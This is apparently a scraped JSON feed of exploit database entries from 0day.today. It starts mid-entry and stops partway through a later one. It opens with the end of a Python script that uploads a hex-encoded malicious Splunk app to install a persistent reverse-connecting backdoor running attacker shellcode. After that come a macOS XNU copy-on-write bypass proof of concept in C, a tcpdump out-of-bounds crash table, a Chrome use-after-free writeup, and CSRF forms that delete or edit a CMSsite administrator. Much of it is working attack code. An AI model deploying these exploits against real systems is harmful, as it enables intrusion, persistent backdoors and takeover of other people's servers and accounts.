driver.current_url\r\n\tcheckUrl(current_url)\r\n\r\n\tform = driver.find_element_by_tag_name(\"form\")\r\n\tinput = form.find_element_by_id(\"appfile\")\r\n\tinput.send_keys(getcwd()+'/'+'splunk-shell.tar.gz')\r\n\tforce_update = driver.find_element_by_id(\"force\")\r\n\tforce_update.click()\r\n\tsubmit_button = driver.find_element_by_class_name(\"splButton-primary\")\r\n\tsubmit_button.click()\r\n\r\n\tprint '[*] Your persistent shell has been successfully uploaded!'\r\n\tprint '[*] Be patient, this might take up to a minute...!'\r\n\tdriver.quit()\r\n\r\n\r\ndef generatePayload(shellcode):\r\n\t# this hex decodes into the evil splunk app (tar.gz file) that we will be uploading as the payload\r\n\t# after the app is written to disk, together with the provided custom shellcode.\r\n\t# the app configuration sets it to be enabled upon installation (restarting splunk / manually enabling it is not required.)\r\n\t# this is a PERSISTENT backdoor, there is no need to re-upload multiple times... the backdoor will reconnect every 10-20 seconds\r\n\r\n\t# CHANGED: the compressed app folder structure is loading a custom binary from inputs.conf\r\n\tprint '[*] Creating Splunk App...'\r\n\tshell = '1f8b0800e229795c0003ed9c5b6fdbc81580a95c363283b65ea068b7401f06711749dc58e24da4ad34ad9dc44183a6dd20f2260b288a322247126b8a6449cab2374d11f407f4bddbd75efe47db97bef5adfd237def197264eb6ad95959c93ae703a42139c3b99d396766c8e1c4a1d7f577d7e236f3bca27436288a62954a2475cdcc553423730544d50dddd434c3d44ca2a8866ae812299d517e86e8c6098d202b1d9a242c981e0e82359bc7c423ca71e87e438807e55fa817ee57ea952488d83cd380fa300d63bafc556b40fea606f2371543958832cf4c4ce30397bf74f97b57a40b92f44b6a93cf2ae40b22e0d7a425f869f07b003f7ebecf6fe887d85c9e16e5d6cece1371b8dfbf0b793f19d6ffb3d0fe59faaf1a8a628ce87fc9d44aa8ff0b2277b7eba892c4d5392f65ee257972d0bcf88d7141b81ff1f8781c71d8f082069cfdab11ce3dc70882cc1baebb17a586e44a7ea337a8bf9e1b278af29fdc858b972e7f74259f97f3f2b7e45aa51df42a094dbaf15d1a55f9d9639ab41be2782708bcc363da78eab25e7df9bbf7023fa1aecfa2f466d76110e4f933d77782dedda0eb3b7175c0239f5fca2fd5973f79f54a2f29b788baa1bdbe455e59161c435ff1faf552fefb9faa771ebeec1c7cf9eab7af7ff7c7ac14b99c28ce77468af7d551f1f62a91ef057e4b4a8d95744572242635252a75254f4ace6be1478a39520997e15a20d9e0eb0d54c0fffa15f0df7e052cc95797ae7efbead27015d4977f2832fecc7592f60ef3b73db6c7fccfa247346173ab95c19aceaf6c36ff9d166e564de57f70fdc19317dddfffe1ab3ffdf92f7ffddbdfff3152591f8f54d63f87ab63a4a2ce25a260f9abef361b0882bc8770fb4084bb29dc37999b13fe17847b69e09e65e112e16e0af74de6e644b80bc2bd24dcbc7097854b84bb29dc37992b8c564e4c3e7222e59c98a1e4c4038a1c11eee6a98a8c201f0c17336799f7ffdbd3e7ff08829c637297ee57eedf95a6cf74785f4be0f7b27f8334792020c2f2aef813e9282c11eea670df642e0e0410044116cdd0fbbf86eb9fc51a90d3acffb00c85afffb05405d77f2c8221f93bac49bb5e32ef367042f96b9a6a6a4a89cbbf542a6928ff4530247f2fb0e919ac02e37217557352f96b8a89f25f0423f26fc567d001bc85fe2b16eaff4218923f0dc398457b2c9a6f2338bdfc4d552fa1fc17c190fc3b2ca10e4de89c6dc05be8bf85f67f314c967f3a1028f0d379a401f5611ed7ff5b9a35227fcb344c5cffb708aa60f38bae0fa503f90bb71e07ddc86675bbcdecddb8dba9c9d025c46ee0933bc42a68055dee044ee276189cab25a3b4a199d6ba52009d35d761a0a7c8f250acf09fb013c56115f40d5dd7b42c8e9a4c6d9bc53184881875489954c92aa9dd22bdc84d58ff5466fb61102510283e8813d6999dce7a492f6c94544b578ff2da75676710caa7140c553537cca31b3ddaf5a19ea29a1cf47c164160ea745cffa491e99abe7e145948ed5dda62c5b4e2ebcd20aa7743d047169f3873869295eac4f29facff622238270b0019328e5bffafebfab0fe6b60012cd4ff4570522d93ab611484713166bed3a1ae571c57bcbe02f84123700e64796565853c7db8fdacb2b3b5b35d2913be1e0c3ca30ef54817c6993189db41d773488311daf018490262431e20d5b84d23e6903d97f552eb1143fa472727ccf2bbaeda6f0453c6ffbca25d7b4ee3c0d38fff2c433370fcb7088e973f5cf05c1b0e03bf60c7f15ba631c3feeb9aa18dd87fcd3014b4ff8ba0b84aeeb5a9df02ebdb06331c86c40b5a0181110d2b1012b324bdde666eab9d147b7c6d2f81710939801122713b3058b945684c7ad07ab8cbc38614c28029e7c76908b25a940b10f3231ef12b997f3b96c55726861eeedf26e9a534ee325957e04a7aa10183a156c49700974937f26ef4dba4db6915e35d185c1e3eaeceda709d67bcdef0e0b642e8b76e4257b316b110fa13024d2a8bb3fe75226db9cdb1485fcb32d4e04e37f2090cce7891c5fd240c6297eb8debb748d04cbdae55d238c9e3a007d5eb5c1baa6a5e49599ac27ba0ba8aabab72f6d1dd2af9dcb7834e87f999609a81e7053d9e86e7fa2c26377a2ed4fe75c785a8e8c175c23b6d16252e8b6f72994087db4bef4b53e66966d113714399ac75822fd75c9fc7b6067563ef661577e82fbc1a3043dcbdcd2318cb609aef341bbd36ef8e13b69f1c7a9235d21d2c400cfebd805c3f92cb609e89dbe42dedba03a5db85d649862b302bc5485203851a103697f5b599c20eb37833a1a751f296746d50eab11d419573e19324a27e1cc240c54fc65bd75b2708adec240942317911b92e3edc3607bcec03ee05c8877f93a59336ea61e99cbd70e6269d433d5f94740e6dc0bca5236ca1a6f70d5f87462dd75f4b82b0ac1e5ecccca359e2e799d191bb5c3e6d37e68a2df433d56d9fc2bc50981c30bb852c64aab6595afc06eafc1a7a3e423db7e5a7f24e25c54b5a00c1ca6e735254041273fd430372abdf410ce5a10cd5e3b3db503a61f77f0e6374163d8be010e6076d5518353bf082a8bc62e9b45412e679208fa26f80b2beeb1ef27c33fefe87cfeee0608e69cc9aff2b8a3afafcdfd0f0f9df4240f5fab099aaff05756e69bc85fe974cfcfe7f21a0fe7fd84c58ffc3c78c76e01fd7d84fc7acf77fa0fba3fa6feaa8ff0ba12aded2d5e4f4d93ab94398cf1fc63bb25ce52fc5dcb8bee7c62e7f3c7f87a870f1e885975c15efab6af2d80bab34f0bb2e1b329b89eb3fe76c0166e9bf668deabfa55a06eaff22588169f753f16e592d2805455ee93fc8e1137ede0adc56374a5f0190a6eb3150fb31930133ffcc664c59400041b4f5e686696ea84c5159c3341c47b7b566c3b42d4a9beb8a61db25bb411bdac624b3d3a45ecc648f3698c7df36f2a6ba069943fb320726eabfeb3b6c9fc5f3b201b3c6ff9a35f6fe1f0c06eaff2218d3ff0218807be95bf8985012d34e083a983688f471a6b8c05789146479a59a9dd7e49576d0617c671688ef0ef951e5f1a3cf7ff58bfafdbbc52c40d169c82b76e039c704e1de3c58d2a63d96059c142cf38680efbaeace0513f53f5dea31bf11c02cfd57cdd1f9bf5542fd5f0c83fa9fad2c039d166b7c40ab1f3cdc7e747febd1c3adca5a276eb90e686407feb72a243d9557b6bfd879b2756f67ed37a95fffceea8be7b5daeaf35af979fce31b3ffb0978feb4faa25c5bbd5946ad7dbf98d2ff87dd647e0660b6fe5b47fb7f96f8fe9f9665e2febf0b61d2f8ffb0fbf749da122674fcd5d88edc3029178b85f4ab51b6c7cd457f1e00964081b940c2a23dea115591b3f9407210a6c3f9ae8f56e07d61ecfbdf33d8035c39c5fedfd9f7bfa6a9e0fbbfc580fb7f7fd08cebfffcf7003f5eff87f7ff16faaff3ef3f51ff17c284fdbfa54f27079db9ff771a9f88034110044190f71bdcff1b419069e0fedf08727e19d9ff7bdafc1f419073ccccfdbff9f59703c76fa4e98300dcff1b41100441100441100441100441100441100441100441100441100441ce86ff0365f75f'\r\n\tbytes = shell.decode('hex')\r\n\tf = open('splunk-shell.tar.gz','wb')\r\n\tf.write(bytes)\r\n\tf.close()\r\n\r\n\tif shellcode == \"evil\":\r\n\t\tprint \"shellcode filename needs to be different - please change it\"\r\n\t\texit()\r\n\r\n\tprint '\\t==> Adding custom shellcode'\r\n\t# custom shellcode loading\r\n\twith open(shellcode, \"rb\") as binaryfile :\r\n\t \tevil_bytes = bytearray(binaryfile.read())\r\n\tf = open('evil','w')\r\n\tf.write(evil_bytes)\r\n\tf.close()\r\n\tst = os.stat('evil')\r\n\t# making the binary executable\r\n\tos.chmod('evil', st.st_mode | stat.S_IEXEC)\r\n\tdecompress_cmd = 'tar zxvf splunk-shell.tar.gz &>/dev/null; rm splunk-shell.tar.gz'\r\n\tp = Popen(decompress_cmd, shell=True, executable='/bin/bash')\r\n\tp.wait()\r\n\tmove_cmd = 'cp evil splunk-shell/bin/'\r\n\tp = Popen(move_cmd, shell=True, executable='/bin/bash')\r\n\tp.wait()\r\n\tcompress_cmd = 'tar zcvf splunk-shell.tar.gz splunk-shell/ &>/dev/null; rm -r splunk-shell/'\r\n\tp = Popen(compress_cmd, shell=True, executable='/bin/bash')\r\n\tp.wait()\r\n\tif path.isfile('splunk-shell.tar.gz'):\r\n\t\tprint '\\t==> Payload Ready! (splunk-shell.tar.gz)'\r\n\r\ndef showUsage():\r\n\tprint '\\n\\tScript Usage: {} <targetUrl> <username> <password> <shellcode>'.format(argv[0])\r\n print '\\tExample: {} http://192.168.4.16:8000 admin changeme shellcode.bin\\n'.format(argv[0])\r\n\r\nif len(argv) != 5:\r\n\tshowUsage()\r\n\texit()\r\n\r\nif not path.isfile(gecko_driver_path):\r\n\tprint '\\n\\t[!] This program requires geckodriver, download the corresponding version for your OS from the following link:'\r\n\tprint '\\t\\t==> https://github.com/mozilla/geckodriver/releases'\r\n\tprint '\\n\\t[!] Extract the geckodriver binary, then add its full path to line 20 of this script.'\r\n\tprint '\\t\\t==> gecko_driver_path = \"/tmp/geckodriver\"\\n'\r\n\texit()\r\n\r\nsplunk_target_url = argv[1]\r\nsplunk_admin_user = argv[2]\r\nsplunk_admin_pass = argv[3]\r\nsplunk_shellcode = argv[4]\r\ngeneratePayload(splunk_shellcode)\r\nexploit(splunk_target_url, splunk_admin_user, splunk_admin_pass)\n\n# 0day.today [2019-03-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32300"}, {"lastseen": "2019-03-05T02:29:55", "bulletinFamily": "exploit", "description": "Exploit for macOS platform in category dos / poc", "modified": "2019-03-02T00:00:00", "published": "2019-03-02T00:00:00", "id": "1337DAY-ID-32288", "href": "https://0day.today/exploit/description/32288", "title": "macOS XNU - Copy-on-Write Behavior #Bypass via Mount of User-Owned Filesystem Image Exploit", "type": "zdt", "sourceData": "XNU has various interfaces that permit creating copy-on-write copies of data\r\nbetween processes, including out-of-line message descriptors in mach messages.\r\nIt is important that the copied memory is protected against later modifications\r\nby the source process; otherwise, the source process might be able to exploit\r\ndouble-reads in the destination process.\r\n\r\nThis copy-on-write behavior works not only with anonymous memory, but also with\r\nfile mappings. This means that, after the destination process has started\r\nreading from the transferred memory area, memory pressure can cause the pages\r\nholding the transferred memory to be evicted from the page cache. Later, when\r\nthe evicted pages are needed again, they can be reloaded from the backing\r\nfilesystem.\r\n\r\nThis means that if an attacker can mutate an on-disk file without informing the\r\nvirtual management subsystem, this is a security bug.\r\n\r\nMacOS permits normal users to mount filesystem images. When a mounted filesystem\r\nimage is mutated directly (e.g. by calling pwrite() on the filesystem image),\r\nthis information is not propagated into the mounted filesystem.\r\n\r\n\r\nThe following is a simple proof-of-concept that demonstrates the problem, split\r\nacross multiple small helpers for simplicity:\r\n\r\n\r\nbuggycow.c (opens a file from a FAT image mount, creates a CoW mapping, and\r\nreads from it when requested):\r\n===============\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <mach/mach.h>\r\n#include <mach/mach_vm.h>\r\n\r\nint main(void) {\r\n setbuf(stdout, NULL);\r\n\r\n int fd = open(\"/Volumes/NO NAME/testfile\", O_RDWR);\r\n if (fd == -1) err(1, \"open\");\r\n unsigned int *mapping = mmap(NULL, 0x4000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);\r\n if (mapping == MAP_FAILED) err(1, \"mmap\");\r\n\r\n pointer_t cow_mapping;\r\n mach_msg_type_number_t cow_mapping_size;\r\n if (vm_read(mach_task_self(), (mach_vm_address_t)mapping, 0x4000, &cow_mapping, &cow_mapping_size) != KERN_SUCCESS) errx(1, \"vm read\");\r\n if (cow_mapping_size != 0x4000) errx(1, \"vm read size\");\r\n\r\n while (1) {\r\n printf(\"orig mapping has value 0x%x, cow mapping has value 0x%x\\n\", *mapping, *(unsigned int*)cow_mapping);\r\n printf(\"press enter to continue: \");\r\n getchar();\r\n }\r\n}\r\n===============\r\n\r\nmod.c (modifies file contents inside the FAT filesystem image):\r\n===============\r\n#include <fcntl.h>\r\n#include <err.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n\r\nint main(void) {\r\n int fd = open(\"fatimg.img\", O_RDWR);\r\n if (fd == -1) err(1, \"open\");\r\n if (pwrite(fd, \"AAAA\", 4, 0x37000) != 4) err(1, \"pwrite\");\r\n printf(\"done\\n\");\r\n}\r\n===============\r\n\r\npressure.c (creates memory pressure; you may have to change `SIZE` such that it\r\nis significantly bigger than the amount of RAM in your test machine):\r\n===============\r\n#include <err.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n\r\n#define SIZE (1024UL*1024UL*1024UL*20UL)\r\n\r\nint main(void) {\r\n int fd = open(\"spamfile\", O_RDWR|O_TRUNC|O_CREAT, 0666);\r\n if (fd == -1) err(1, \"open\");\r\n if (ftruncate(fd, SIZE)) err(1, \"ftruncate\");\r\n char *mapping = mmap(NULL, SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);\r\n if (mapping == MAP_FAILED) err(1, \"mmap\");\r\n if (madvise(mapping, SIZE, MADV_RANDOM)) err(1, \"madvise\");\r\n puts(\"mapped\");\r\n for (unsigned long off = 0; off < SIZE; off++) {\r\n mapping[off] = 42;\r\n }\r\n puts(\"done\");\r\n}\r\n===============\r\n\r\nfatimg.img.bz2.base64 (FAT filesystem with a single file \"testfile\" in\r\nit, which contains the string \"HELLO WORLD AAAA\", stored at offset 0x37000):\r\n===============\r\nQlpoOTFBWSZTWWCuw5MFfk7//d/7wSDRITEEZ2ffiTfv3KZAAEgIAJQECUBCBAlAybABOE1hqp+i\r\nkfkjETATJkwJgGiGIY1NM1PQEbU2jRqFTIjRmpo0ADRoMgAAAAGTJgTIARSSIaaZNGjQNAAAAAGg\r\nAAaNAGJ+LRgQ8YFAZoEEE/idIUFFFRJ4qiiqibs6RBGfFDBkXMCKKKqJFHpmCRSJUy7KhlXpv+9v\r\n3xSiKkuWmWKvXPKtepMgooqomAQta6v5itC2YCvDFO2sRZn2nInTRQ0JDp3gdpjD2ksNgl5x3wDH\r\nIm3IkclmyVSy9hRzIWICM3xvZFLMqoTCM/zPU/QuS7kTsbg0EpXafayp5MmFUFvIVffyBxYWMQxC\r\nmELiRSUEmFTeEU2GyYJz4a6Bk9/eOGIUssEiThI2PAmlnHmgOGYdB6KHlZpCKIIOtCUdYeCKc8zg\r\nde5s8XX09eXR3r0f+n1NGwwBRRVRJ1oZEJSIkf5igrJMprIcE8W+Ar8cgAGAAAAQQABhAJqMhUBL\r\nUhUBLmKCskymsgePd5wAyE6AEYAAAAQAEEAAYZgKU0yogi2Kogi8XckU4UJCdb3A9A==\r\n===============\r\n\r\n\r\nTo reproduce:\r\n\r\nUnpack and compile the files:\r\n\r\n$ base64 -D < fatimg.img.bz2.base64 | bunzip2 > fatimg.img\r\n$ cc -o buggycow buggycow.c\r\n$ cc -o mod mod.c\r\n$ cc -o pressure pressure.c\r\n$\r\n\r\nMount the filesystem image (e.g. by double-clicking on it in finder).\r\n\r\nIn one terminal:\r\n\r\n$ ./buggycow \r\norig mapping has value 0x4c4c4548, cow mapping has value 0x4c4c4548\r\npress enter to continue: \r\n\r\nIn a second terminal:\r\n\r\n$ ./mod\r\ndone\r\n$ ./pressure \r\nmapped\r\n\r\n\r\nOnce you can see in \"top\" that there has been no physical memory anymore for a\r\nwhile - or when ./pressure has finished running -, go back to the first terminal\r\nand press enter. You should see this:\r\n\r\n$ ./buggycow \r\norig mapping has value 0x4c4c4548, cow mapping has value 0x4c4c4548\r\npress enter to continue: \r\norig mapping has value 0x41414141, cow mapping has value 0x41414141\r\npress enter to continue:\r\n\r\n(Weirdly, when you kill the ./pressure helper, e.g. by pressing CTRL+C, it\r\ntakes minutes before the process actually disappears.)\r\n\r\n\r\nIan made a proof of concept that demonstrates that this also applies to COW\r\nmappings created via out-of-line descriptors in mach messages; I've attached\r\nthis PoC as mOOM_COW.tar.bz2. Usage:\r\n\r\n$ tar xf mOOM_COW.tar.bz2\r\n$ cd mOOM_COW\r\n$ vi mOOM_COW.c # edit RAM_GB in the first line to the amount of RAM in your machine\r\n$ cc -o mOOM_COW mOOM_COW.c\r\n$ ./mOOM_COW\r\n[+] child got stashed port\r\n[+] child sent hello message to parent over shared port\r\n[+] parent received hello message from child\r\n[+] child restored stolen port\r\n[+] mounted fatimg\r\n[+] child sent message to parent\r\n[+] parent got an OOL descriptor for 4000 bytes, mapped COW at: 0x10bead000\r\n[+] parent reads: 4c4c4548\r\n[+] telling child to try to change what I see!\r\n[+] child received ping to start trying to change the OOL memory!\r\n[+] child wrote to the file underlying the mount\r\n\r\n[+] child is spamming\r\n[+] child has finished spamming\r\n[+] parent got ping message from child, lets try to read again...\r\n[+] parent reads: 41414141\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46478.zip\n\n# 0day.today [2019-03-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32288"}, {"lastseen": "2019-03-05T02:18:45", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2019-03-02T00:00:00", "published": "2019-03-02T00:00:00", "id": "1337DAY-ID-32287", "href": "https://0day.today/exploit/description/32287", "title": "tcpdump < 4.9.3 - Multiple Heap-Based Out-of-Bounds Reads Exploit", "type": "zdt", "sourceData": "tcpdump < 4.9.3 - Multiple Heap-Based Out-of-Bounds Reads Exploit\r\n\r\nThrough fuzzing of network capture .pcap files, we have identified 16 crashes with unique stack traces in tcpdump. These crashes are caused by heap-based out-of-bounds memory reads, and can be reproduced with the latest tcpdump source code from GitHub, compiled with AddressSanitizer:\r\n\r\n--- cut ---\r\n$ ./tcpdump --version\r\ntcpdump version 4.10.0-PRE-GIT\r\nlibpcap version 1.10.0-PRE-GIT (with TPACKET_V3)\r\nOpenSSL 1.1.0h 27 Mar 2018\r\nCompiled with AddressSanitizer/CLang.\r\n--- cut ---\r\n\r\nThe command line options we used are as follows:\r\n\r\n--- cut ---\r\n$ ./tcpdump -e -XX -vvv -R $file\r\n--- cut ---\r\n\r\nA summary of each crash with the two top-level callstack items are shown below:\r\n\r\n+----------------------------------+-------------------------------------------------------------------------+\r\n| Id | Top of stack trace |\r\n+----------------------------------+-------------------------------------------------------------------------+\r\n| 0c7293c683364afcf4d60f10fa296429 | #0 0x55fdd6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x55f43c in mfr_print tcpdump/./print-fr.c:498:17 |\r\n| 1092c136071deb2f21ddcde498353dfc | #0 0x773fb6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x774b8a in lmp_print_data_link_subobjs tcpdump/./print-lmp.c:411:6 |\r\n| 472984168e31d86fcc3a2cf9b5ac1ddc | #0 0x7c5666 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x7e440e in rx_cache_find tcpdump/./print-rx.c:735:27 |\r\n| 55dca8197d3a7e5900df99c60db2821a | #0 0x73b2cb in rpl_printopts tcpdump/./print-icmp6.c:824:27 |\r\n| | #1 0x73af8b in rpl_daoack_print tcpdump/./print-icmp6.c:952:17 |\r\n| 5966513c685d91c5dc5edb42e5191ed4 | #0 0x7b975b in print_attr_vector64 tcpdump/./print-radius.c:1044:4 |\r\n| | #1 0x7b349e in radius_attrs_print tcpdump/./print-radius.c:1199:18 |\r\n| 5ef0457a44194a7e0fb1f1fa9c2d538c | #0 0x744b26 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x74ff59 in ikev1_n_print tcpdump/./print-isakmp.c:1766:4 |\r\n| 6535c4a7b0942711db1a5570bf428576 | #0 0x729f56 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x72835f in icmp_print tcpdump/./print-icmp.c:573:25 |\r\n| 6d3d893a2bc2d8d50cd9386737f1a3f1 | #0 0x773fb6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x774881 in lmp_print_data_link_subobjs tcpdump/./print-lmp.c:403:13 |\r\n| 7efd0ef3a3602ffba4d429f2beaf8489 | #0 0x5d1486 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x5d3ab7 in ospf6_print_lshdr tcpdump/./print-ospf6.c:394:2 |\r\n| 8e933ef7fdb3b248cffd2cc432ddfe0e | #0 0x5d1486 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x5d3ab7 in ospf6_print_lshdr tcpdump/./print-ospf6.c:394:2 |\r\n| 9a16cc309f6e8c57587f6cfc19ad15e0 | #0 0x773fb6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x774881 in lmp_print_data_link_subobjs tcpdump/./print-lmp.c:403:13 |\r\n| ab10aa7f73ff686440d2d40a174bf801 | #0 0x651a86 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x651264 in vrrp_print tcpdump/./print-vrrp.c:155:5 |\r\n| b388f74a9f892fb85d750dd0e32efce1 | #0 0x60d676 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x60ad3a in rsvp_obj_print tcpdump/./print-rsvp.c:1581:17 |\r\n| d203c6b47e3cbdf814ad3769589b3628 | #0 0x4bdf60 in __asan_memcpy (tcpdump/tcpdump+0x4bdf60) |\r\n| | #1 0x682088 in ip6addr_string tcpdump/./addrtoname.c:359:2 |\r\n| ec26a95bd915adce3527d4e8152eea84 | #0 0x7ba077 in EXTRACT_BE_U_8 tcpdump/./extract.h:111:20 |\r\n| | #1 0x7b97f5 in print_attr_vector64 tcpdump/./print-radius.c:1046:17 |\r\n| f7fc9a6bc515585b470f8b9c2d2729d7 | #0 0x651a86 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x650f19 in vrrp_print tcpdump/./print-vrrp.c:147:5 |\r\n+----------------------------------+-------------------------------------------------------------------------+\r\n\r\nAttached is a ZIP archive containing up to three input samples per each crash, together with the corresponding ASAN logs.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46476.zip\n\n# 0day.today [2019-03-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32287"}, {"lastseen": "2019-03-05T02:28:19", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2019-03-02T00:00:00", "published": "2019-03-02T00:00:00", "id": "1337DAY-ID-32290", "href": "https://0day.today/exploit/description/32290", "title": "Google Chrome < M72 - FileWriterImpl Use-After-Free Exploit", "type": "zdt", "sourceData": "Google Chrome < M72 - FileWriterImpl Use-After-Free Exploit\r\n\r\nThere's a use-after-free in the implementation of the FileWriter component of the mojo bindings for the filesystem API.\r\n\r\nThe browser-process side of this API is defined in https://cs.chromium.org/chromium/src/third_party/blink/public/mojom/filesystem/file_writer.mojom?type=cs&sq=package:chromium&g=0\r\n\r\nThe method we are interested in is the Write method - this takes a parameter of type blink.mojom.Blob. The implementation of this method is as follows:\r\n\r\nvoid FileWriterImpl::Write(uint64_t position,\r\n blink::mojom::BlobPtr blob,\r\n WriteCallback callback) {\r\n blob_context_->GetBlobDataFromBlobPtr(\r\n std::move(blob),\r\n base::BindOnce(&FileWriterImpl::DoWrite, base::Unretained(this),\r\n std::move(callback), position));\r\n}\r\n\r\nNote that the last argument to GetBlobDataFromBlobPtr is a callback object bound to base::Unretained(this).\r\n\r\nAnd the implementation of GetBlobDataFromBlobPtr:\r\n\r\nvoid BlobStorageContext::GetBlobDataFromBlobPtr(\r\n blink::mojom::BlobPtr blob,\r\n base::OnceCallback<void(std::unique_ptr<BlobDataHandle>)> callback) {\r\n DCHECK(blob);\r\n blink::mojom::Blob* raw_blob = blob.get();\r\n raw_blob->GetInternalUUID(mojo::WrapCallbackWithDefaultInvokeIfNotRun(\r\n base::BindOnce(\r\n [](blink::mojom::BlobPtr, base::WeakPtr<BlobStorageContext> context,\r\n base::OnceCallback<void(std::unique_ptr<BlobDataHandle>)> callback,\r\n const std::string& uuid) {\r\n if (!context || uuid.empty()) {\r\n std::move(callback).Run(nullptr);\r\n return;\r\n }\r\n std::move(callback).Run(context->GetBlobDataFromUUID(uuid));\r\n },\r\n std::move(blob), AsWeakPtr(), std::move(callback)),\r\n \"\"));\r\n}\r\n\r\nHowever, the call to GetInternalUUID is a mojo interface method; and if the renderer instead of providing a handle to a browser-process-hosted Blob object instead provides a handle to a renderer-hosted Blob implementation, then during this call into the renderer we can destroy the renderer handle to the FileWriter, triggering the immediate destruction of the FileWriterImpl. When the callback is then subsequently called after GetInternalUUID returns, the base::Unretained reference to the stale object will be used.\r\n\r\n\r\nTo reproduce you need a local build of chrome; run the attached script \r\n\r\n$ python ./copy_mojo_js_bindings.py /path/to/chrome/.../out/Asan/gen\r\n$ python -m SimpleHTTPServer&\r\n$ out/Asan/chrome --enable-blink-features=MojoJS --user-data-dir=/tmp/nonexist 'http://localhost:8000/file_writer.html' \r\n\r\nNote that this is *not* a renderer bug; it's a browser process bug that's reachable from the renderer. The attached poc is using the MojoJS bindings to trigger the issue, but a compromised renderer could perform the same actions without any special settings.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46475.zip\n\n# 0day.today [2019-03-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32290"}, {"lastseen": "2019-03-06T00:21:38", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-03-02T00:00:00", "published": "2019-03-02T00:00:00", "id": "1337DAY-ID-32295", "href": "https://0day.today/exploit/description/32295", "title": "CMSsite 1.0 Cross Site Request Forgery Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Delete Admin)\r\n# Exploit Author: Mr Winst0n\r\n# Author E-mail: manamtabeshekan[@]gmail[.]com\r\n# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite\r\n# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip\r\n# Tested Version: 1.0\r\n# Tested on: Kali linux, Windows 8.1 \r\n\r\n# PoC:\r\n\r\n<!doctype html>\r\n<html>\r\n<head>\r\n <title>Delete Admin</title>\r\n</head>\r\n <body>\r\n <form method=\"post\" action=\"http://localhost/[PATH]/admin/users.php?del=1\">\r\n <input type=\"submit\" value=\"Delete\">\r\n </form> \r\n </body>\r\n</html>\r\n\r\n\r\n# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Edit Admin)\r\n# Exploit Author: Mr Winst0n\r\n# Author E-mail: manamtabeshekan[@]gmail[.]com\r\n# Discovery Date: March 1, 2019\r\n# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite\r\n# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip\r\n# Tested Version: 1.0\r\n# Tested on: Kali linux, Windows 8.1 \r\n\r\n# PoC:\r\n\r\n<!doctype html>\r\n<html>\r\n<head>\r\n <title>Edit Admin</title>\r\n</head>\r\n<body>\r\n <form role=\"form\" action=\"http://localhost/[PATH]/admin/users.php?source=edit_user&u_id=10\" method=\"POST\" enctype=\"multipart/form-data\" >\r\n\r\n <!-- You can change u_id value -->\r\n\r\n<div class=\"form-group\">\r\n <label for=\"user_title\">User Name</label>\r\n <input type=\"text\" name=\"user_name\" required>\r\n </div><br>\r\n\r\n <div class=\"form-group\">\r\n <label for=\"user_author\">FirstName</label>\r\n <input type=\"text\" name=\"user_firstname\" required>\r\n </div><br>\r\n\r\n <div class=\"form-group\">\r\n <label for=\"user_status\">LastName</label>\r\n <input type=\"text\" name=\"user_lastname\" required>\r\n </div><br>\r\n \r\n <div class=\"input-group\">\r\n <select name=\"user_role\" id=\"\">\r\n <label for=\"user_role\">Role</label>\r\n <option value='User'>Admin</option>\r\n <option value='User'>User</option>\r\n </select>\r\n \r\n </div><br>\r\n <div class=\"form-group\">\r\n <label for=\"post_image\">User Image</label>\r\n <input type=\"file\" name=\"user_image\">\r\n </div><br>\r\n \r\n <div class=\"form-group\">\r\n <label for=\"user_tag\">Email</label>\r\n <input type=\"email\" name=\"user_email\" class=\"form-control\"required>\r\n </div><br>\r\n \r\n <div class=\"form-group\">\r\n <label for=\"user_tag\">Password</label>\r\n <input type=\"password\" name=\"user_password\" required>\r\n </div><br>\r\n <hr>\r\n\r\n <button type=\"submit\" name=\"update_user\" value=\"Update User\">Update User</button>\r\n\r\n </form>\r\n</body>\r\n</html>\r\n\r\n\r\n\r\n# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Add Admin)\r\n# Exploit Author: Mr Winst0n\r\n# Author E-mail: 